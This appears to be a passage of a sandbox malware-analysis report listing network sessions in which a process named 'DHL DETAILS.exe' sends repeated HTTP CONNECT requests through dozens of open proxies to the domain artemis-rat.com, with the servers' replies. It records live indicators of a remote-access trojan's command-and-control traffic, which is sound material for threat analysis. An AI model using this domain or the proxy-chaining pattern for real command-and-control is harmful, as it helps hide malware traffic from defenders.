Mar 9, 2024 13:14:19.223830938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
956	192.168.2.5	53020	49.4.48.128	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.054075956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
957	192.168.2.5	53028	52.54.249.241	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.058079958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.273484945 CET	66	IN	HTTP/1.1 400 BAD_REQUEST Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
958	192.168.2.5	51858	91.134.140.160	51513	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.058093071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.567641020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.166001081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.102178097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
959	192.168.2.5	53034	44.190.9.65	48100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.066907883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
960	192.168.2.5	50503	37.187.91.192	11721	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.067370892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.223706961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
961	192.168.2.5	52234	162.214.225.223	43265	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.073255062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
962	192.168.2.5	52854	36.134.91.82	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.073494911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
963	192.168.2.5	52514	24.249.199.4	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.074709892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
964	192.168.2.5	53026	177.12.118.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.096107006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
965	192.168.2.5	53032	121.128.194.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.167074919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
966	192.168.2.5	53033	84.39.112.144	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.169275999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
967	192.168.2.5	50721	23.225.72.122	3500	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.171240091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.270586014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
968	192.168.2.5	53029	167.172.86.46	10471	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.173547983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
969	192.168.2.5	53037	8.218.231.62	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.173594952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
970	192.168.2.5	53129	45.144.30.205	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.173600912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
971	192.168.2.5	50806	132.148.16.169	41824	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.174479961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.223968029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
972	192.168.2.5	53031	45.118.132.180	45449	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.174771070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
973	192.168.2.5	50076	167.172.67.207	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.183429956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.542408943 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
974	192.168.2.5	53137	45.144.30.205	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.188127995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
975	192.168.2.5	53147	45.144.30.205	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.190932035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
976	192.168.2.5	53149	45.144.30.205	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.192908049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
977	192.168.2.5	53151	31.7.65.18	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.194241047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
978	192.168.2.5	53152	31.7.65.18	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.195017099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
979	192.168.2.5	53157	31.7.65.18	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.196331978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
980	192.168.2.5	53159	31.7.65.18	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.197271109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
981	192.168.2.5	53051	192.154.244.92	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.205298901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
982	192.168.2.5	53038	65.21.255.197	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.213779926 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:16.543402910 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Length: 0
Mar 9, 2024 13:14:16.872688055 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
983	192.168.2.5	53040	46.35.9.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.229823112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
984	192.168.2.5	53042	23.137.248.197	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.229825974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
985	192.168.2.5	53035	89.218.8.152	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.242698908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036458969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
986	192.168.2.5	52220	8.130.34.237	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.247016907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.580643892 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
987	192.168.2.5	53039	8.222.239.209	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.250076056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.973912001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
988	192.168.2.5	52717	192.111.134.10	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.252144098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
989	192.168.2.5	50708	194.233.78.142	35513	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.253968000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.333271980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
990	192.168.2.5	49877	112.196.112.243	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.260934114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.695116043 CET	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
991	192.168.2.5	51832	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.261200905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
992	192.168.2.5	53067	45.12.30.231	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.261955976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.416416883 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
993	192.168.2.5	53043	185.49.31.207	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.262070894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
994	192.168.2.5	53070	104.24.193.186	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.263015032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.417964935 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
995	192.168.2.5	52291	148.66.130.53	56350	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.264501095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
996	192.168.2.5	53041	8.219.228.100	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.323626995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
997	192.168.2.5	52354	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.323678970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
998	192.168.2.5	50546	51.68.164.77	32824	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.329602003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
